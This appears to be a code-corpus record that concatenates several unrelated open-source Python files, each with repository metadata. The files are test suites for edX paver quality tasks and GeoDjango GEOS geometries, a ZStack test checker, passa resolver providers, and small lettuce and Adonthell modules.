1, '2m', '', '', '', '')
lines = report[0].split("\n")
assert "banana" in lines[0] and "albero" in lines[0] and "finestra" in lines[0] and "tutelare" in lines[0] and "ambiente" in lines[0]
#extra attributes (countries, categories, timezones, etc.)
def testDownloadGeoRight():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', 'IT', '', '', '')
lines = report[0].split("\n")
assert "Italy" in lines[1]
def testDownloadCat():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '0-71', '', '')
assert "Food & Drink" in report[0]
def testDownloadSearchType():
report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
1, '2m', '', '', 'news', '')
lines = report[0].split("\n")
assert "News" in lines[0]
#there is no way to test TZ, so I leave this as an exercize to the reader.
# def testDownloadTZ():
# report = gtrends._downloadReport(username, password, ["ciao"], startDt, 1,
# 1, '2m', '', '', '', 'America/Detroit')
# assert ? | mit | 4,239,487,882,005,819,400 | 30.314286 | 134 | 0.628565 | false |
fintech-circle/edx-platform | pavelib/paver_tests/test_paver_quality.py | 1 | 14472 | """
Tests for paver quality tasks
"""
import os
import tempfile
import textwrap
import unittest
import paver.easy
import paver.tasks
from ddt import ddt, file_data
from mock import MagicMock, mock_open, patch
from path import Path as path
from paver.easy import BuildFailure
import pavelib.quality
from pavelib.paver_tests.utils import fail_on_eslint, fail_on_pylint
@ddt
class TestPaverQualityViolations(unittest.TestCase):
"""
For testing the paver violations-counting tasks
"""
def setUp(self):
super(TestPaverQualityViolations, self).setUp()
self.f = tempfile.NamedTemporaryFile(delete=False)
self.f.close()
self.addCleanup(os.remove, self.f.name)
def test_pylint_parser_other_string(self):
with open(self.f.name, 'w') as f:
f.write("hello")
num = pavelib.quality._count_pylint_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 0)
def test_pylint_parser_pep8(self):
# Pep8 violations should be ignored.
with open(self.f.name, 'w') as f:
f.write("foo/hello/test.py:304:15: E203 whitespace before ':'")
num = pavelib.quality._count_pylint_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 0)
@file_data('pylint_test_list.json')
def test_pylint_parser_count_violations(self, value):
"""
Tests:
- Different types of violations
- One violation covering multiple lines
"""
with open(self.f.name, 'w') as f:
f.write(value)
num = pavelib.quality._count_pylint_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 1)
def test_pep8_parser(self):
with open(self.f.name, 'w') as f:
f.write("hello\nhithere")
num, _violations = pavelib.quality._pep8_violations(f.name) # pylint: disable=protected-access
self.assertEqual(num, 2)
class TestPaverReportViolationsCounts(unittest.TestCase):
"""
For testing utility functions for getting counts from reports for
run_eslint, run_complexity, run_safelint, and run_safecommit_report.
"""
def setUp(self):
super(TestPaverReportViolationsCounts, self).setUp()
# Mock the paver @needs decorator
self._mock_paver_needs = patch.object(pavelib.quality.run_quality, 'needs').start()
self._mock_paver_needs.return_value = 0
# Temporary file infrastructure
self.f = tempfile.NamedTemporaryFile(delete=False)
self.f.close()
# Cleanup various mocks and tempfiles
self.addCleanup(self._mock_paver_needs.stop)
self.addCleanup(os.remove, self.f.name)
def test_get_eslint_violations_count(self):
with open(self.f.name, 'w') as f:
f.write("3000 violations found")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "eslint") # pylint: disable=protected-access
self.assertEqual(actual_count, 3000)
def test_get_eslint_violations_no_number_found(self):
with open(self.f.name, 'w') as f:
f.write("Not expected string regex")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "eslint") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_get_eslint_violations_count_truncated_report(self):
"""
A truncated report (i.e. last line is just a violation)
"""
with open(self.f.name, 'w') as f:
f.write("foo/bar/js/fizzbuzz.js: line 45, col 59, Missing semicolon.")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "eslint") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_complexity_value(self):
with open(self.f.name, 'w') as f:
f.write("Average complexity: A (1.93953443446)")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "python_complexity") # pylint: disable=protected-access
self.assertEqual(actual_count, 1.93953443446)
def test_truncated_complexity_report(self):
with open(self.f.name, 'w') as f:
f.write("M 110:4 FooBar.default - A")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "python_complexity") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_no_complexity_report(self):
with self.assertRaises(BuildFailure):
pavelib.quality._get_count_from_last_line("non-existent-file", "python_complexity") # pylint: disable=protected-access
def test_generic_value(self):
"""
Default behavior is to look for an integer appearing at head of line
"""
with open(self.f.name, 'w') as f:
f.write("5.777 good to see you")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "foo") # pylint: disable=protected-access
self.assertEqual(actual_count, 5)
def test_generic_value_none_found(self):
"""
Default behavior is to look for an integer appearing at head of line
"""
with open(self.f.name, 'w') as f:
f.write("hello 5.777 good to see you")
actual_count = pavelib.quality._get_count_from_last_line(self.f.name, "foo") # pylint: disable=protected-access
self.assertEqual(actual_count, None)
def test_get_safelint_counts_happy(self):
"""
Test happy path getting violation counts from safelint report.
"""
report = textwrap.dedent("""
test.html: 30:53: javascript-jquery-append: $('#test').append(print_tos);
javascript-concat-html: 310 violations
javascript-escape: 7 violations
2608 violations total
""")
with open(self.f.name, 'w') as f:
f.write(report)
counts = pavelib.quality._get_safelint_counts(self.f.name) # pylint: disable=protected-access
self.assertDictEqual(counts, {
'rules': {
'javascript-concat-html': 310,
'javascript-escape': 7,
},
'total': 2608,
})
def test_get_safelint_counts_bad_counts(self):
"""
Test getting violation counts from truncated and malformed safelint
report.
"""
report = textwrap.dedent("""
javascript-concat-html: violations
""")
with open(self.f.name, 'w') as f:
f.write(report)
counts = pavelib.quality._get_safelint_counts(self.f.name) # pylint: disable=protected-access
self.assertDictEqual(counts, {
'rules': {},
'total': None,
})
def test_get_safecommit_count_happy(self):
"""
Test happy path getting violation count from safecommit report.
"""
report = textwrap.dedent("""
Linting lms/templates/navigation.html:
2 violations total
Linting scripts/tests/templates/test.underscore:
3 violations total
""")
with open(self.f.name, 'w') as f:
f.write(report)
count = pavelib.quality._get_safecommit_count(self.f.name) # pylint: disable=protected-access
self.assertEqual(count, 5)
def test_get_safecommit_count_bad_counts(self):
"""
Test getting violation count from truncated safecommit report.
"""
report = textwrap.dedent("""
Linting lms/templates/navigation.html:
""")
with open(self.f.name, 'w') as f:
f.write(report)
count = pavelib.quality._get_safecommit_count(self.f.name) # pylint: disable=protected-access
self.assertIsNone(count)
def test_get_safecommit_count_no_files(self):
"""
Test getting violation count from safecommit report where no files were
linted.
"""
report = textwrap.dedent("""
No files linted.
""")
with open(self.f.name, 'w') as f:
f.write(report)
count = pavelib.quality._get_safecommit_count(self.f.name) # pylint: disable=protected-access
self.assertEqual(count, 0)
class TestPrepareReportDir(unittest.TestCase):
"""
Tests the report directory preparation
"""
def setUp(self):
super(TestPrepareReportDir, self).setUp()
self.test_dir = tempfile.mkdtemp()
self.test_file = tempfile.NamedTemporaryFile(delete=False, dir=self.test_dir)
self.addCleanup(os.removedirs, self.test_dir)
def test_report_dir_with_files(self):
self.assertTrue(os.path.exists(self.test_file.name))
pavelib.quality._prepare_report_dir(path(self.test_dir)) # pylint: disable=protected-access
self.assertFalse(os.path.exists(self.test_file.name))
def test_report_dir_without_files(self):
os.remove(self.test_file.name)
pavelib.quality._prepare_report_dir(path(self.test_dir)) # pylint: disable=protected-access
self.assertEqual(os.listdir(path(self.test_dir)), [])
class TestPaverRunQuality(unittest.TestCase):
"""
For testing the paver run_quality task
"""
def setUp(self):
super(TestPaverRunQuality, self).setUp()
# test_no_diff_quality_failures seems to alter the way that paver
# executes these lines is subsequent tests.
# https://github.com/paver/paver/blob/master/paver/tasks.py#L175-L180
#
# The other tests don't appear to have the same impact. This was
# causing a test order dependency. This line resets that state
# of environment._task_in_progress so that the paver commands in the
# tests will be considered top level tasks by paver, and we can predict
# which path it will chose in the above code block.
#
# TODO: Figure out why one test is altering the state to begin with.
paver.tasks.environment = paver.tasks.Environment()
# mock the @needs decorator to skip it
self._mock_paver_needs = patch.object(pavelib.quality.run_quality, 'needs').start()
self._mock_paver_needs.return_value = 0
patcher = patch('pavelib.quality.sh')
self._mock_paver_sh = patcher.start()
self.addCleanup(patcher.stop)
self.addCleanup(self._mock_paver_needs.stop)
@patch('__builtin__.open', mock_open())
def test_failure_on_diffquality_pep8(self):
"""
If pep8 finds errors, pylint and eslint should still be run
"""
# Mock _get_pep8_violations to return a violation
_mock_pep8_violations = MagicMock(
return_value=(1, ['lms/envs/common.py:32:2: E225 missing whitespace around operator'])
)
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
# Test that pep8, pylint and eslint were called by counting the calls to
# _get_pep8_violations (for pep8) and sh (for diff-quality pylint & eslint)
self.assertEqual(_mock_pep8_violations.call_count, 1)
self.assertEqual(self._mock_paver_sh.call_count, 2)
@patch('__builtin__.open', mock_open())
def test_failure_on_diffquality_pylint(self):
"""
If diff-quality fails on pylint, the paver task should also fail
"""
# Underlying sh call must fail when it is running the pylint diff-quality task
self._mock_paver_sh.side_effect = fail_on_pylint
_mock_pep8_violations = MagicMock(return_value=(0, []))
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
# Test that both pep8 and pylint were called by counting the calls
# Assert that _get_pep8_violations (which calls "pep8") is called once
self.assertEqual(_mock_pep8_violations.call_count, 1)
# And assert that sh was called twice (for the calls to pylint & eslint).
# This means that even in the event of a diff-quality pylint failure, eslint is still called.
self.assertEqual(self._mock_paver_sh.call_count, 2)
@patch('__builtin__.open', mock_open())
def test_failure_on_diffquality_eslint(self):
"""
If diff-quality fails on eslint, the paver task should also fail
"""
# Underlying sh call must fail when it is running the eslint diff-quality task
self._mock_paver_sh.side_effect = fail_on_eslint
_mock_pep8_violations = MagicMock(return_value=(0, []))
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
self.assertRaises(BuildFailure)
# Test that both pep8 and pylint were called by counting the calls
# Assert that _get_pep8_violations (which calls "pep8") is called once
self.assertEqual(_mock_pep8_violations.call_count, 1)
# And assert that sh was called twice (for the calls to pep8 and pylint)
self.assertEqual(self._mock_paver_sh.call_count, 2)
@patch('__builtin__.open', mock_open())
def test_other_exception(self):
"""
If diff-quality fails for an unknown reason on the first run (pep8), then
pylint should not be run
"""
self._mock_paver_sh.side_effect = [Exception('unrecognized failure!'), 0]
with self.assertRaises(SystemExit):
pavelib.quality.run_quality("")
self.assertRaises(Exception)
# Test that pylint is NOT called by counting calls
self.assertEqual(self._mock_paver_sh.call_count, 1)
@patch('__builtin__.open', mock_open())
def test_no_diff_quality_failures(self):
# Assert nothing is raised
_mock_pep8_violations = MagicMock(return_value=(0, []))
with patch('pavelib.quality._get_pep8_violations', _mock_pep8_violations):
pavelib.quality.run_quality("")
# Assert that _get_pep8_violations (which calls "pep8") is called once
self.assertEqual(_mock_pep8_violations.call_count, 1)
# And assert that sh was called twice (for the call to "pylint" & "eslint")
self.assertEqual(self._mock_paver_sh.call_count, 2)
| agpl-3.0 | -2,740,539,081,380,800,500 | 39.766197 | 134 | 0.635918 | false |
zstackorg/zstack-woodpecker | zstackwoodpecker/zstackwoodpecker/header/checker.py | 3 | 3333 | '''
Zstack checker header classes
@author: YYK
'''
import zstackwoodpecker.test_util as test_util
class TestChecker(object):
def __init__(self):
import os
self.exp_result = True
self.real_result = None
self.retry_count = 5
self.test_obj = None
retry_env = os.environ.get('WOODPECKER_TEST_FAILURE_RETRY')
if retry_env and retry_evn.isdigit():
self.retry_count = int(retry_env)
def __repr__(self):
return self.__class__.__name__
def set_exp_result(self, exp_result):
self.exp_result = exp_result
def set_test_object(self, test_obj):
self.test_obj = test_obj
def set_retry_count(self, retry_count):
self.retry_count = retry_count
def check(self):
'''
The sub class check() function usually will call this super function.
And after the real checking, it should call self.judge(TEST_RESULT).
The inheritance class, should not add more params to this function.
'''
test_util.test_logger('Checker: [%s] begins.'% self.__class__.__name__)
def judge(self, result):
self.real_result = result
if self.exp_result == result:
test_util.test_logger('\
Checker: [%s] PASS. Expected result: %s. Test result: %s.' \
% (self.__class__.__name__, self.exp_result, self.real_result))
return True
else:
if self.retry_count:
test_util.test_logger('\
Checker: [%s] FAIL. Expected result: %s. Test result: %s. Try again. The left \
retry times: %s' % (self.__class__.__name__, self.exp_result, \
self.real_result, str(self.retry_count)))
self.retry_count -= 1
import time
time.sleep(1)
self.test_obj.update()
self.check()
else:
test_util.test_fail('\
Checker: [%s] FAIL. Expected result: %s. Test result: %s. No Retry' \
% (self.__class__.__name__, \
self.exp_result, self.real_result))
class CheckerFactory(object):
def create_checker(self):
pass
class CheckerChain(object):
def __init__(self):
self.checker_chain = []
def __repr__(self):
class_str = 'CheckerChain:'
for checker in self.checker_chain:
class_str = '%s [%s]' % (class_str, checker.__class__.__name__)
if not self.checker_chain:
class_str = '%s None' % class_str
return class_str
def add_checker(self, checker, exp_result, test_obj):
checker.set_test_object(test_obj)
checker.set_exp_result(exp_result)
self.checker_chain.append(checker)
def add_checker_dict(self, checker_dict, test_obj):
for key, value in checker_dict.iteritems():
checker = key()
checker.set_exp_result(value)
checker.set_test_object(test_obj)
self.checker_chain.append(checker)
def remove_checker(self, checker):
self.checker_chain.remove(checker)
def check(self):
if not self.checker_chain:
test_util.test_warn('Not find any checker!')
return
for checker in self.checker_chain:
checker.check()
| apache-2.0 | -1,096,926,603,586,833,300 | 30.149533 | 79 | 0.561956 | false |
kennethreitz/pipenv | pipenv/vendor/passa/models/providers.py | 1 | 8586 | # -*- coding=utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import os
import resolvelib
from ..internals.candidates import find_candidates
from ..internals.dependencies import get_dependencies
from ..internals.utils import (
filter_sources, get_allow_prereleases, identify_requirment, strip_extras,
)
PROTECTED_PACKAGE_NAMES = {"pip", "setuptools"}
class BasicProvider(resolvelib.AbstractProvider):
"""Provider implementation to interface with `requirementslib.Requirement`.
"""
def __init__(self, root_requirements, sources,
requires_python, allow_prereleases):
self.sources = sources
self.requires_python = requires_python
self.allow_prereleases = bool(allow_prereleases)
self.invalid_candidates = set()
# Remember requirements of each pinned candidate. The resolver calls
# `get_dependencies()` only when it wants to repin, so the last time
# the dependencies we got when it is last called on a package, are
# the set used by the resolver. We use this later to trace how a given
# dependency is specified by a package.
self.fetched_dependencies = {None: {
self.identify(r): r for r in root_requirements
}}
# Should Pipfile's requires.python_[full_]version be included?
self.collected_requires_pythons = {None: ""}
def identify(self, dependency):
return identify_requirment(dependency)
def get_preference(self, resolution, candidates, information):
# TODO: Provide better sorting logic. This simply resolve the ones with
# less choices first. Not sophisticated, but sounds reasonable?
return len(candidates)
def find_matches(self, requirement):
sources = filter_sources(requirement, self.sources)
candidates = find_candidates(
requirement, sources, self.requires_python,
get_allow_prereleases(requirement, self.allow_prereleases),
)
return candidates
def is_satisfied_by(self, requirement, candidate):
# A non-named requirement has exactly one candidate, as implemented in
# `find_matches()`. Since pip does not yet implement URL based lookup
# (PEP 508) yet, it must match unless there are duplicated entries in
# Pipfile. If there is, the user takes the blame. (sarugaku/passa#34)
if not requirement.is_named:
return True
# A non-named candidate can only come from a non-named requirement,
# which, since pip does not implement URL based lookup (PEP 508) yet,
# can only come from Pipfile. Assume the user knows what they're doing,
# and use it without checking. (sarugaku/passa#34)
if not candidate.is_named:
return True
# Optimization: Everything matches if there are no specifiers.
if not requirement.specifiers:
return True
# We can't handle old version strings before PEP 440. Drop them all.
# Practically this shouldn't be a problem if the user is specifying a
# remotely reasonable dependency not from before 2013.
candidate_line = candidate.as_line(include_hashes=False)
if candidate_line in self.invalid_candidates:
return False
try:
version = candidate.get_specifier().version
except (TypeError, ValueError):
print('ignoring invalid version from {!r}'.format(candidate_line))
self.invalid_candidates.add(candidate_line)
return False
return requirement.as_ireq().specifier.contains(version)
def get_dependencies(self, candidate):
sources = filter_sources(candidate, self.sources)
try:
dependencies, requires_python = get_dependencies(
candidate, sources=sources,
)
except Exception as e:
if os.environ.get("PASSA_NO_SUPPRESS_EXCEPTIONS"):
raise
print("failed to get dependencies for {0!r}: {1}".format(
candidate.as_line(include_hashes=False), e,
))
dependencies = []
requires_python = ""
# Exclude protected packages from the list. This prevents those
# packages from being locked, unless the user is actually working on
# them, and explicitly lists them as top-level requirements -- those
# packages are not added via this code path. (sarugaku/passa#15)
dependencies = [
dependency for dependency in dependencies
if dependency.normalized_name not in PROTECTED_PACKAGE_NAMES
]
if candidate.extras:
# HACK: If this candidate has extras, add the original candidate
# (same pinned version, no extras) as its dependency. This ensures
# the same package with different extras (treated as distinct by
# the resolver) have the same version. (sarugaku/passa#4)
dependencies.append(strip_extras(candidate))
candidate_key = self.identify(candidate)
self.fetched_dependencies[candidate_key] = {
self.identify(r): r for r in dependencies
}
self.collected_requires_pythons[candidate_key] = requires_python
return dependencies
class PinReuseProvider(BasicProvider):
"""A provider that reuses preferred pins if possible.
This is used to implement "add", "remove", and "only-if-needed upgrade",
where already-pinned candidates in Pipfile.lock should be preferred.
"""
def __init__(self, preferred_pins, *args, **kwargs):
super(PinReuseProvider, self).__init__(*args, **kwargs)
self.preferred_pins = preferred_pins
def find_matches(self, requirement):
candidates = super(PinReuseProvider, self).find_matches(requirement)
try:
# Add the preferred pin. Remember the resolve prefer candidates
# at the end of the list, so the most preferred should be last.
candidates.append(self.preferred_pins[self.identify(requirement)])
except KeyError:
pass
return candidates
class EagerUpgradeProvider(PinReuseProvider):
"""A specialized provider to handle an "eager" upgrade strategy.
An eager upgrade tries to upgrade not only packages specified, but also
their dependencies (recursively). This contrasts to the "only-if-needed"
default, which only promises to upgrade the specified package, and
prevents touching anything else if at all possible.
The provider is implemented as to keep track of all dependencies of the
specified packages to upgrade, and free their pins when it has a chance.
"""
def __init__(self, tracked_names, *args, **kwargs):
super(EagerUpgradeProvider, self).__init__(*args, **kwargs)
self.tracked_names = set(tracked_names)
for name in tracked_names:
self.preferred_pins.pop(name, None)
# HACK: Set this special flag to distinguish preferred pins from
# regular, to tell the resolver to NOT use them for tracked packages.
for pin in self.preferred_pins.values():
pin._preferred_by_provider = True
def is_satisfied_by(self, requirement, candidate):
# If this is a tracking package, tell the resolver out of using the
# preferred pin, and into a "normal" candidate selection process.
if (self.identify(requirement) in self.tracked_names and
getattr(candidate, "_preferred_by_provider", False)):
return False
return super(EagerUpgradeProvider, self).is_satisfied_by(
requirement, candidate,
)
def get_dependencies(self, candidate):
# If this package is being tracked for upgrade, remove pins of its
# dependencies, and start tracking these new packages.
dependencies = super(EagerUpgradeProvider, self).get_dependencies(
candidate,
)
if self.identify(candidate) in self.tracked_names:
for dependency in dependencies:
name = self.identify(dependency)
self.tracked_names.add(name)
self.preferred_pins.pop(name, None)
return dependencies
def get_preference(self, resolution, candidates, information):
# Resolve tracking packages so we have a chance to unpin them first.
name = self.identify(candidates[0])
if name in self.tracked_names:
return -1
return len(candidates)
| mit | -7,365,321,261,601,924,000 | 42.363636 | 79 | 0.658164 | false |
dreamsxin/adonthell | test/questtest.py | 2 | 1251 | from adonthell import event, main, rpg
import sys
# -- test event callbacks
# -- test class
class App (main.AdonthellApp):
def run (self):
# -- add data directory to python search path
sys.path.insert (0, "data")
# -- load quest tree
rpg.quest.load ()
# -- setup some quest events
factory = event.factory ()
# -- one that detects all changes to the children of Quest_1
capture_all_event = rpg.quest_event ("Quest_1.>")
listener = factory.add (capture_all_event)
listener.connect_callback ("quest_events", "event_callbacks", "capture_all")
# -- one that detects changes of Quest_1
quest_1_event = rpg.quest_event ("Quest_1")
listener = factory.add (quest_1_event)
listener.connect_callback ("quest_events", "event_callbacks", "quest_1")
# -- start completing quest steps
rpg.quest.set_completed ("Quest_1.Part_1.Step_3")
rpg.quest.set_completed ("Quest_1.Step_1")
# -- TODO: save and reload, then continue ...
# -- complete remaining quest steps
rpg.quest.set_completed ("Quest_1.Part_1.Step_5")
rpg.quest.set_completed ("Quest_1.Step_2")
rpg.quest.set_completed ("Quest_1.Part_1.Step_4")
return 0
# -- main
if __name__ == '__main__':
theApp = App ()
theApp.init (theApp.run)
| gpl-2.0 | 8,304,030,802,440,692,000 | 26.8 | 78 | 0.66267 | false |
gxx/lettuce | lettuce/plugins/reporter.py | 19 | 2156 | import sys
class Reporter(object):
def __init__(self):
self.failed_scenarios = []
self.scenarios_and_its_fails = {}
def wrt(self, what):
if isinstance(what, unicode):
what = what.encode('utf-8')
sys.stdout.write(what)
def store_failed_step(self, step):
if step.failed and step.scenario not in self.failed_scenarios:
self.scenarios_and_its_fails[step.scenario] = step.why
self.failed_scenarios.append(step.scenario)
def print_scenario_running(self, scenario):
pass
def print_scenario_ran(self, scenario):
pass
def print_end(self, total):
if total.scenarios_passed < total.scenarios_ran:
self.wrt("\n")
self.wrt("\n")
for scenario in self.failed_scenarios:
reason = self.scenarios_and_its_fails[scenario]
self.wrt(unicode(reason.step))
self.wrt("\n")
self.wrt(reason.traceback)
self.wrt("\n")
word = total.features_ran > 1 and "features" or "feature"
self.wrt("%d %s (%d passed)\n" % (
total.features_ran,
word,
total.features_passed))
word = total.scenarios_ran > 1 and "scenarios" or "scenario"
self.wrt("%d %s (%d passed)\n" % (
total.scenarios_ran,
word,
total.scenarios_passed))
steps_details = []
for kind in "failed", "skipped", "undefined":
attr = 'steps_%s' % kind
stotal = getattr(total, attr)
if stotal:
steps_details.append("%d %s" % (stotal, kind))
steps_details.append("%d passed" % total.steps_passed)
word = total.steps > 1 and "steps" or "step"
self.wrt("%d %s (%s)\n" % (
total.steps,
word,
", ".join(steps_details)))
if total.failed_scenario_locations:
self.wrt("\n")
self.wrt("List of failed scenarios:\n")
for scenario in total.failed_scenario_locations:
self.wrt(scenario)
self.wrt("\n")
| gpl-3.0 | -3,331,234,153,947,072,000 | 31.179104 | 70 | 0.533859 | false |
AloneRoad/Inforlearn | vendor/django/contrib/gis/tests/test_geos.py | 5 | 31499 | import random, unittest, sys
from ctypes import ArgumentError
from django.contrib.gis.geos import *
from django.contrib.gis.geos.base import HAS_GDAL
from django.contrib.gis.tests.geometries import *
if HAS_NUMPY: from numpy import array
if HAS_GDAL: from django.contrib.gis.gdal import OGRGeometry, SpatialReference, CoordTransform, GEOJSON
class GEOSTest(unittest.TestCase):
@property
def null_srid(self):
"""
Returns the proper null SRID depending on the GEOS version.
See the comments in `test15_srid` for more details.
"""
info = geos_version_info()
if info['version'] == '3.0.0' and info['release_candidate']:
return -1
else:
return None
def test01a_wkt(self):
"Testing WKT output."
for g in wkt_out:
geom = fromstr(g.wkt)
self.assertEqual(g.ewkt, geom.wkt)
def test01b_hex(self):
"Testing HEX output."
for g in hex_wkt:
geom = fromstr(g.wkt)
self.assertEqual(g.hex, geom.hex)
def test01c_kml(self):
"Testing KML output."
for tg in wkt_out:
geom = fromstr(tg.wkt)
kml = getattr(tg, 'kml', False)
if kml: self.assertEqual(kml, geom.kml)
def test01d_errors(self):
"Testing the Error handlers."
# string-based
print "\nBEGIN - expecting GEOS_ERROR; safe to ignore.\n"
for err in errors:
try:
g = fromstr(err.wkt)
except (GEOSException, ValueError):
pass
print "\nEND - expecting GEOS_ERROR; safe to ignore.\n"
class NotAGeometry(object):
pass
# Some other object
self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
# None
self.assertRaises(TypeError, GEOSGeometry, None)
# Bad WKB
self.assertRaises(GEOSException, GEOSGeometry, buffer('0'))
def test01e_wkb(self):
"Testing WKB output."
from binascii import b2a_hex
for g in hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex)
def test01f_create_hex(self):
"Testing creation from HEX."
for g in hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01g_create_wkb(self):
"Testing creation from WKB."
from binascii import a2b_hex
for g in hex_wkt:
wkb = buffer(a2b_hex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalised
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test01h_ewkt(self):
"Testing EWKT."
srid = 32140
for p in polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test01i_json(self):
"Testing GeoJSON input/output (via GDAL)."
if not HAS_GDAL or not GEOJSON: return
for g in json_geoms:
geom = GEOSGeometry(g.wkt)
self.assertEqual(g.json, geom.json)
self.assertEqual(g.json, geom.geojson)
self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test01j_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
# Error shouldn't be raise on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertNotEqual(g, None)
self.assertNotEqual(g, {'foo' : 'bar'})
self.assertNotEqual(g, False)
def test02a_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(True, pnt == fromstr(p.wkt))
self.assertEqual(False, pnt == prev)
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertEqual(True, pnt.hasz)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertEqual(False, pnt.hasz)
self.assertEqual(None, pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(True, pnt == pnt2)
self.assertEqual(True, pnt == pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test02b_multipoints(self):
"Testing MultiPoint objects."
for mp in multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
self.assertRaises(GEOSIndexError, mpnt.__getitem__, len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.points, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertEqual(p.empty, False)
self.assertEqual(p.valid, True)
def test03a_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for l in linestrings:
ls = fromstr(l.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertEqual(ls.ring, False)
if hasattr(l, 'centroid'):
self.assertEqual(l.centroid, ls.centroid.tuple)
if hasattr(l, 'tup'):
self.assertEqual(l.tup, ls.tuple)
self.assertEqual(True, ls == fromstr(l.wkt))
self.assertEqual(False, ls == prev)
self.assertRaises(GEOSIndexError, ls.__getitem__, len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt) # Point individual arguments
if HAS_NUMPY: self.assertEqual(ls, LineString(array(ls.tuple))) # as numpy array
def test03b_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for l in multilinestrings:
ml = fromstr(l.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)
self.assertEqual(True, ml == fromstr(l.wkt))
self.assertEqual(False, ml == prev)
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.empty, False)
self.assertRaises(GEOSIndexError, ml.__getitem__, len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test04_linearring(self):
